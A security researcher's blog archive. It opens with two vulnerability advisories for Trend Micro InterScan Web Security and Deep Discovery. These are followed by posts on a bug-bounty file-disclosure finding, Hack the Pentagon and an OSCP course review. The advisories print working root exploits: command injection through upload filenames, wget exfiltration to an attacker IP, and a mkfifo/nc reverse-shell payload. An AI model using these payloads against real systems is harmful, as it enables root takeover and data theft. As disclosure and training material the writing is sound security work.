ZDI-16-348: Trend Micro InterScan Web Security ManagePatches filename Remote Code Execution Vulnerability

Version: IWSVA65sp2

Summary:

The com.trend.iwss.gui.servlet.ManagePatches servlet contains a flaw allowing any authenticated user (including ‘Report Only’ users) to execute commands under the context of the root user.

Details:

The com.trend.iwss.gui.servlet.ManagePatches servlet is used by elevated privilege users to upload files (patches). The functionality, however, can be used by any authenticated user simply by substituting their cookie into the request (below is a sample of the stripped down valid request).

POST /servlet/com.trend.iwss.gui.servlet.ManagePatches?action=upload HTTP/1.1
Host: <server IP>:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<server IP>:8443/admin_patch_mgmt2.jsp?CSRFGuardToken=MQG8WJXIT4J8GASYYA7OVCXXBKUIGG5D
Cookie: JSESSIONID=<INSERT COOKIE VALUE HERE>
Connection: close
Content-Type: multipart/form-data; boundary=—————————141658507810329061771972399818
Content-Length: 259

—————————–141658507810329061771972399818
Content-Disposition: form-data; name=”patchFileName”; filename=”test.xml”
Content-Type: text/xml

—————————–141658507810329061771972399818–

The actual injection takes place in the name of the file being uploaded. By performing the following tests, the delay in responses indicates that command execution is occurring.

Initial test:

—————————–141658507810329061771972399818
Content-Disposition: form-data; name=”patchFileName”; filename=”test.xml&ping 127.0.0.1 -c 10″
Content-Type: text/xml

Secondary test:

—————————–141658507810329061771972399818
Content-Disposition: form-data; name=”patchFileName”; filename=”test.xml&ping 127.0.0.1 -c 30″
Content-Type: text/xml

This gives any user the ability to execute simple non interactive commands. However, more complex (including remote shell) are possible.

By issuing a ‘wget <ip>’ of the attacker machine, a response is seen. However, exfiltrating information a bit more tricky. Special characters like ‘/’,'<‘,’>’ are not sent across to the server. But utilizing the environment itself, it becomes possible to insert characters like the ‘/’. Below is an example of a user running a wget to retrieve the current user using the given command (where [ip address] is your receiving machine):

Command –

filename=”test.xml&wget `echo [ip address]“echo $PATH | cut -c1“id`”

EXPLANATION: using ` (or even $()) to escape, it is possible to pull the ‘/’ character from the current $PATH and insert it into the command, creating the full wget of [ip address]/`id`

Apache Log –

4

This grants the ability to exfiltrate some data, as well as upload (via wget) files.

Now the attacker has the ability to create a shell by uploading a file containing the following:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip address] 5555 >/tmp/f

To upload the file, the attacker simply names this file to shell, then uploads using this vulnerability and wget:

test.xml&wget `echo [ip address]“echo $PATH | cut -c1`shell

Once the file has been uploaded (will be placed in the /var/iwss/patch/bin folder), the attacker can chmod and then execute the file as a script, creating a reverse shell, running as root:

test.xml&chmod a+x shell

test.xml&.`echo $PATH | cut -c1`shell

5

CVE-2016-5840: Trend Micro Deep Discovery hotfix_upload.cgi filename Remote Code Execution Vulnerability

Version: TDA 2.6.1062r1

Summary:

The hotfix_upload.cgi file contains a flaw allowing a user to execute commands under the context of the root user.

Details:

The hotfix_upload.cgi file is used to upload files (hot fixes). Below is a sample of the upload function being used:

POST /cgi-bin/hotfix_upload.cgi?sID=hotfix_temp HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://<server IP>/cgi-bin/hotfix_history.cgi
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Content-Type: multipart/form-data; boundary=—————————7e0823930136
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: <server IP>
Content-Length: 206
Connection: close
Cache-Control: no-cache
Cookie: session_id=

—————————–7e0823930136
Content-Disposition: form-data; name=”ajaxuploader_file”; filename=”test.txt”
Content-Type: text/plain

a
—————————–7e0823930136–

The actual injection takes place in the name of the file being uploaded (ie. filename=”test.txt&id”). By performing the following request, system information is sent back in the response:

1

This gives any user the ability to execute simple non interactive commands. However, more complex (including remote shell) commands are possible.

Special characters like ‘/’,'<‘,’>’ are not sent across to the server. But utilizing the environment itself, it becomes possible to insert characters like the ‘/’. Below is an example of a user using this method to retrieve the /etc/passwd file (NOTE: `echo $PATH | cut -c1` will print ‘/‘ to the final command):

2

Now the attacker has the ability to create a shell by uploading a file containing the following (where [ip address] is your receiving machine):

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip address] 5555 >/tmp/f

To upload the file, the attacker simply names this file to shell, then uploads using this vulnerability and wget:

test.txt&wget http:`echo $PATH | cut -c1“echo $PATH | cut -c1`[ip]`echo $PATH | cut -c1`shell

Once the file has been uploaded (it will be placed in /opt/TrendMicro/MinorityReport/www/cgi-bin), the attacker can chmod and then execute the file as a script, creating a reverse shell, running as root:

test.xml&chmod a+x shell

test.xml&.`echo $PATH | cut -c1`shell

3

otx.alienvault.com Local File Disclosure

20160602_074255

Those who know me are aware that I partake in bug bounty programs.  Today I’m giving you a brief post on a recent finding and the response/reward received after the submission.

AlienVault had a swag based bug bounty posted, which appears to have gone offline as I can no longer find the page detailing the program.  But while it was live, I decided to take a look since swag based programs are often less examined compared with that of their monetary based brethren.

Within a couple hours I had identified a JSON API by simply altering the unique ID in the URL to that of an invalid ID.  This allowed me to inspect the particular call a little more closely, and that’s where the fun began.

2

By following this same strategy I was able to find information on other API functions, including one called ‘extract’ (https://otx.alienvault.com/otxapi/extract).

The extract query appeared to be pulling data from a flat file, and creating a CSV from the contents before presenting to the user for download.  Clearly this looked interesting.  I tried a few basic path traversals with no luck, then tried escaping the forward slash…..and….

OTX AlienVault Local File DisclosureUh oh.  Victory for me, red flag for the security team.

I don’t like leaving bugs with this level of severity on the table for even a short period of time.  Reflected XSS, sure I’ll stack a few and send en masse.  But not higher criticality bugs.  So I drafted a rather brief email to the PoC for the bug program, with the above screenshot, and sent it on it’s way.

I submitted the bug on May 8th, and by the 13th I was notified that the bug had been confirmed and mitigated.  Excellent response time 🙂

With the mitigation I received the following insight into the finding:

By the way an interesting note on your particular vuln is that we are running inside a container.  We still treat a vuln like this with the highest priority as there are things in that container that are secrets, but for the most part we considering the risk of this vuln largely mitigated by that encapsulation.

This was good to hear as it meant that segmentation was built in.  Good security practice, so kudos there.  Additionally, I’m always happy to see forward thinking companies, like AlienVault, that take a proactive stance to improving security.  Programs like this greatly improve overall security posture, often at a fraction of the cost, and help encourage those of us who want to do the right thing, to do exactly that.

As thanks, AlienVault sent me the following swag bag.

20160602_074255There was actually a second laptop cam cover, but I promptly used it to remove the taped on paper cover I have been using heh.

I plan on wearing the ‘gray hat’ at cons in the future.  Thanks to AlienVault for doing the right thing, and special thanks to Russell Spitler for the quick and friendly responses on the finding!

Hack the Pentagon Top 10

Had to brag a little, because I’m a bit pleased with myself.  The first ever “Hack the Pentagon” bug bounty program kicked off Mid April (the 18th?).  I submitted several flaws within the first 24 after feeling i had fished out the easy shit.

pentagon top 10

 

At the time of the screenshot, I have 8 verified bugs.  You don’t want to know how many duplicates I had (sigh).  Despite this being an ‘invite-only’ private bounty program, there was a lot of media hype and a lot of participation.  The scope was slammed within the first hour.

This is my major ‘gripe’ about bounty programs.  The competition is ridiculous.  The first few days are where the real meat will be found, and the majority of findings are within the first few hours.  This means that whoever sees the program go live, has the best chance.

These programs lack an overall structure that makes it REALLY hard to compete through programs like hackerone and bugcrowd.

I’ll stop whining now.  My goal with the program was to hit the top 10.  Didn’t think i would, but….i’m happy to have been wrong!!!!

An OSCP Review – The OSCP Epic Part 4 – Grand Finale

As of March 12th 2016 I am OSCP certified.  Writing that first sentence was VERY bitter sweet.  I stopped doing the lab after the 4th month.  In all i was putting in roughly 25 hours a week into the lab.  The last two week stint I purchased was a huge boon and pushed well in to the 30+ machines owned category.

You would think that prepared me for the exam.  But it didn’t, and it won’t prepare you either.  It took me more than one attempt to pass.  And the experience I had taking the exam was frustrating, aggravating, and disgusting.  I realize how negative that sounds, and it’s intentional.

Take the hardest machines in the lab, with all their bullshit CTF style games, and give yourself 24 hours to crack them.  Let me revisit that first part.  The exam machines are CTF style.  This means no real world, realistic flaws.  No.  You are given machines that are deliberately configured such that you have to solve puzzles.

The vulnerabilities WILL BE MODIFIED.  If you see a local file inclusion, expect to have to use it indirectly, or to find a ‘clue file’.  Then use that second part to find a third part.  And the third to find a fourth and maybe, just maybe gain shell access, only to solve a WHOLE NEW SET OF PUZZLES to escalate.

And this is why passing the exam is bitter.  Yes I’m one of the few who now holds the piece of paper.  But what does it mean?  The lab helped get my hands dirty and practice with some real flaws and research.  But was vastly unrealistic.  The exam, was despicable and bizarrely inaccurate for a real world demonstration of skill.

I’ve been doing pen testing and red teaming daily, for 5 years now.  And the exam and lab DO NOT PREPARE YOU FOR THE REAL WORLD.  Let me repeat, THEY DO NOT PREPARE YOU.  Am I saying the real world is crazy hard?  Fuck no!!!!  Popping a targeted user base with phishing, moving laterally until you can get domain admin credentials, shadow copy, etc…..FAR EASIER.

Using known vulnerabilities in a real exercise….you don’t have to find clue files, decipher cryptic files to find hidden directories, etc.  My experience with real engagements is far more closely related to a con game than anything, combined with technical knowledge.

How would/could you test that?  No idea.  But I can tell you one thing, the OSCP will not show you what to expect when you are confronted with a real organization.  Not every box is readily exploitable.  Often you have to rely on skills and tricks that are outside the realm of exploits.  Read: conning users into giving you the credentials you want (drive by downloads, social engineering, pop ups, etc).

I’m going to end my rant and summarize.  Yes i’m now certified.  I can’t say i would ever endorse this cert for real world training.  It will get you jobs that pay a lot of money, but you will have to learn real TTPs crazy fast or lose that very same high paying job for not knowing what to do, when, or how.

It is my solid opinion that the OSCP will set you up for failure in the real world.  If you know little to nothing about pen testing, then the course will help facilitate your education.  But not by teaching you, by giving you a sandbox where you effectively TEACH YOURSELF.

I feel like a i just got the CISSP part 2 🙁

An OSCP Review – The OSCP Epic Part 3

I just purchased my third month, and I have mixed feelings about doing so.  I have spent almost 6 weeks (minus 2 out of the 8 for selling my house and moving), averaging almost 20 hours per week.  At this point i have 25 machines fully rooted/system’d, including the ‘gimme’ msf box.  My goal was 24 before taking the exam, but that goal has changed as i discovered my personal weak areas.  That being privilege escalation and modification of binary exploits.

I can say with certainty that web based application hacking experience has carried me far, and fast.  I dropped MANY machines by utilizing web based attack vectors, but have been informed that most machines have multiple avenues of compromise.

Currently, I have all but one network unlocked (dev…wtf?!).  This is a major bone of contention for me.  I have access to the machine that touches the dev network, but haven’t gotten priv esc to unlock the network key.  Why is that frustrating?  because i have shell, and can…well in the real world I WOULD be able to….access the dev subnet.  But because i haven’t unlocked the subnet, i can’t reset machines, and am having port scans come up dead.

So the try harder adage applies right?  Well, yes, but i have uncovered no less than half a dozen machines that unlock the IT network, and only one that unlocked the admin network, and one that will likely unlock dev.  I find this to be disproportionate, and ridiculous, especially when i find a fucking IT subnet key, on an admin network machine (you have to unlock IT before admin).

So i’m a bit frustrated, and a bit disillusioned.  Having done Red Team exercises and pen testing (professionally) for a few years now, i find some of the lab to be realistic, and other parts nothing more than game play.  There is literally a box where it’s nothing more than a CTF style challenge.  No spoilers, but that one aggrevated me on a whole new level, and not because I couldn’t pop it, but because it had no real value other than playing a ‘game’.  It’s not realistic in the slightest.

This leaves me with another month to do the following:

  • Pop a few more boxes (ideally the dev net…sight)
  • Practice priv esc until i gain a little more comfort
  • Practice exploit modification (essential for the exam)
  • Write my lab report
  • Prep my test report

That’s a tall order for one month, but i’m tired of the ‘game’ aspect of the lab, and really fatigued.  I need to rest, and want the exam done with.  So i will be scheduling it for a few weeks after this month is over.  So I should be taking it sometime before christmas.  I can’t wait….lol

An OSCP Review – The OSCP Epic Part 2

Haven’t updated in a while, and that’s because I just got my ass kicked (time wise) from moving.  But here is a breakdown of the experience thus far.

Week 1:

I had only evenings (1-2 hours) and Sunday (all day) to devote to the materials, but part of the certification includes doing the exercises in the material.  I felt much of it was busy work and review, but that may be because I have done this kind of thing in live environments professionally.  For most people I would be the material is pretty overwhelming.  The details are missing in a few places, so without experience it can leave the uninitiated with a lot of homework to do.  BUT, the material was highly relevant.  Using powershell as a call back mechanism, was discussed.  This was very nice to see, and VERY relevant to modern techniques.

Having said it was almost all review for me, it still took me an entire week to get through.  That being a little over 20 hours of time total.  If this stuff is new, plan to multiply that time out at least to a magnitude of 2 or 3.

Week 2:

This is where it got fun.  Finally.  I had finished the exercises in the materials, and was finally hitting the lab.  Doing the exercises did build a little bit of a base, since they have you do a few things that will get you started.  There were a handful of boxes that fell to a VERY well known exploit.  And in roughly ’67’ seconds I had some proof.txt files.  Then I came to a screeching halt.

I enumerated and enumerated and enumerated.  Researched flaw and flaw and found that the labs are constructed with a lot, and i mean a LOT of red herrings.  So don’t expect a scan and pop scenario.  Those exists, but not by and large.

About the 5th day in, I reverted to what i knew best (web applications) and started smashing.   I popped one more really quickly, then found three more to crush.  Unfortunately moving day arrived and I lost internet connectivity until two days ago.  So i just lost an entire week of lab time.  Extension here i come.  I don’t have 10 boxes yet, but should in the very near future.

A big gripe i had, and maybe i just missed something, is that i unlocked a subnet, but have no idea what the range is.  OK, i know, cheating right?  except that i have a client side attack into a network, and no idea if it is one i have unlocked.  See the problem?  I could pivot through, but if i haven’t unlocked the subnet, i can’t progress into that area.  There is a mismatch on that goal.  And i may be stymied until i unlock other subnets, even though in the real world i’d be moving along no problem.

And that’s the update.  I’m on week three, and finally able to get back to the lab (though i’m working so nights and weekend are my limitations)

EDIT: The subnet i unlocked was not visible until i logged in and out of the dashboard.  it did, in fact, coincide with the attack method i discovered so i should be able to pivot into second network very soon.

An OSCP Review – The OSCP Epic Part 1

After several years of yammering on about how I’m dying to take the course (read “blast the labs”), I have finally take the plunge and put my money where my mouth is.  I recently landed a few bounties that left me with some capital to spend, and since I’m in between contracts.  Fuck it.  Let’s do it.  So today I signed up.  I’m currently waiting on an email to get started and find my heart pounding with anticipation.

I have known a handful of OSCP holders, and they assure me I should do really well.  Further, I’ve read MANY reviews about the course/labs/exam, and have a strategy in place to expedite the process.

  • Step 1) Course materials.  I will bang through the course materials as quickly as possible.  Although the syllabus looks to be almost all review, there are exercises involved that help with extra points come exam time.  Seeing as I want to pass no matter what, I’m going for every point I can get my hands on.
  • Step 2) Lab time.  I am literally salivating here.  I can’t wait.  My goal is over half the machines in a month (including pivots).  To accomplish this I have devised a strategy to hit the ground running (and in the background as I smash through step 1).  I’m hoping this lands me a couple low hanging fruit and gives me a toe hold into the external network.  Then, loot and pillage.  Loot and pillage.  Loot and pillage.  Rinse repeat.  I’m going to document (make my report) as I go, to further speed up the process of the final report come exam day.
  • Step 3)  The exam.  I’m going to buy a single month, and tack on a second month if need be.  It’s only a $50 dollar savings if i buy the second month up front, but a $200 dollar savings if i don’t, and don’t need it.  I will be compiling my scripts, exploits, and preparing my report before hand, in hopes that it buys me some extra time.

Some anticipated hurdles and obstacles will likely get in the way.  I have a possible job offer, and starting a new day job could cause me to lose momentum.  Hence the possible second month.  Also, I sold my house and will be moving in a month’s time.  If i can time things well, i will be able to pack and move, and utilize the process as a mental break from the lab, before i review and hit the exam.  But that may not go according to plan, and the second month may be needed.

So there you have it. Time to smash it.  I welcome any words of encouragement, but NO SPOILERS.  I want this, but on my own blood, sweat and tears.  Questions/comments also warmly welcomed!

EDIT: And of course, there was an unforeseen problem.  No one had mentioned to me (or i selectively forgot) that there is a waiting period for the course to begin.  So here I feel all teased up and ready to go, but nope, get ready for the ache to set in, i have to wait until the 29th of this month to get started.  FML.  Two weeks before I can begin?  That’s a gripe right there 🙁

Welcome from the new owner!

this is how i work...seriously

this is how i work…seriously

If you are here for finance advice, you are in the wrong place.  Sorry, but this site is under new management.  The internet marketing experiment is over, and now is the time to pursue my true passion(s).  Join me as I follow the white rabbit and build up my presence and career in the tight knit world of cyber security.

Now to get to know me.  I’ve been a hobbyist for a very long time, but only recently delved into the depths of true knowledge.   I now bug/bounty hunt in my personal time (primarily web application vulns), and am teaching myself binary exploitation.  I have a few of the industry certs, one big one that doesn’t need mentioning, and a few lesser known ones like the eCPPT and eWPT.  The OSCP is in my cross-hairs and I am thoroughly excited to take it down!  I plan to document the latter as I go (adhering to NDAs of course), so join me, learn with and from me, and above all, never stop questioning!